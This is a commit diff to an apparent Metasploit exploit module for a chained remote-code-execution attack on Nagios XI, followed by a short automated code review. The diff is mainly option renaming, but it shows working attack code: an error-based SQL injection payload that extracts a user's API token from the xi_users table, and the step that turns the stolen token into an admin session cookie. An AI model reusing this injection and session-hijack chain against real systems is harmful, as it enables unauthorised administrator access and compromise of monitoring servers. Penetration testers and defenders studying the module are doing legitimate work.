
Commit 3e8cdd1

committed
Polish up USER_ID and API_TOKEN options
1 parent 9d2355d commit 3e8cdd1

1 file changed

+14
-10
lines changed


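--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -44,10 +44,11 @@ def initialize(info = {})
 'LHOST' => Rex::Socket.source_address
 }
 ))
+
 register_options([
-OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
-OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
-], self.class)
+OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]),
+OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
+])
 end
 
 def check
@@ -73,8 +74,8 @@ def exploit
 fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
 end
 
-unless datastore['APITOKEN'].empty?
-@api_token = datastore['APITOKEN']
+if datastore['API_TOKEN']
+@api_token = datastore['API_TOKEN']
 else
 print_status('Getting API token')
 get_api_token
@@ -125,15 +126,17 @@ def get_api_token
 'vars_get' => {
 'mode' => 'resolve',
 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
-"SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
+"SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \
 '),FLOOR(RAND(0)*2))x ' \
 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
 }
 )
+
+# default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
+# any other user has a longer token, but we cant strip the last char off.
+# example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
 if res && res.body =~ /Duplicate entry '(.*?).'/
-if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
-# any other user has a longer token, but we cant strip the last char off.
-# example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+if $1.length > 8
 res.body =~ /Duplicate entry '(.*?)'/
 end
 @api_token = $1
@@ -148,10 +151,11 @@ def get_admin_cookie
 'method' => 'GET',
 'uri' => '/nagiosxi/rr.php',
 'vars_get' => {
-'uid' => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
+'uid' => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" +
 Digest::MD5.hexdigest(@api_token)
 }
 )
+
 if res && (@admin_cookie = res.get_cookies.split('; ').last)
 vprint_good("Admin cookie: #{@admin_cookie}")
 get_csrf_token(res.body)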
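Review bot: In the `exploit` hunk, `if datastore['API_TOKEN']` only guards against `nil`; an empty string is truthy in Ruby, so an `API_TOKEN` that is set to `''` (or normalized to `''` by the datastore — worth confirming for this framework version) would skip `get_api_token` and leave `@api_token` empty, after which `get_admin_cookie` hashes an empty token and the failure surfaces later as a cookie error rather than at the option check. The old `.empty?` test covered that case but not `nil`; covering both keeps the option's "optional, skip the SQLi when supplied" contract honest: `if (token = datastore['API_TOKEN']) && !token.empty?` followed by `@api_token = token`. `exploit`'s body begins and continues outside the hunk. A smaller style point in the `get_api_token` hunk: the three comment lines that explain the `$1.length > 8` check now sit above the outer `if res && ...` line, two statements away from the condition they describe; placing them directly above `if $1.length > 8` would keep the explanation next to the code it qualifies.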
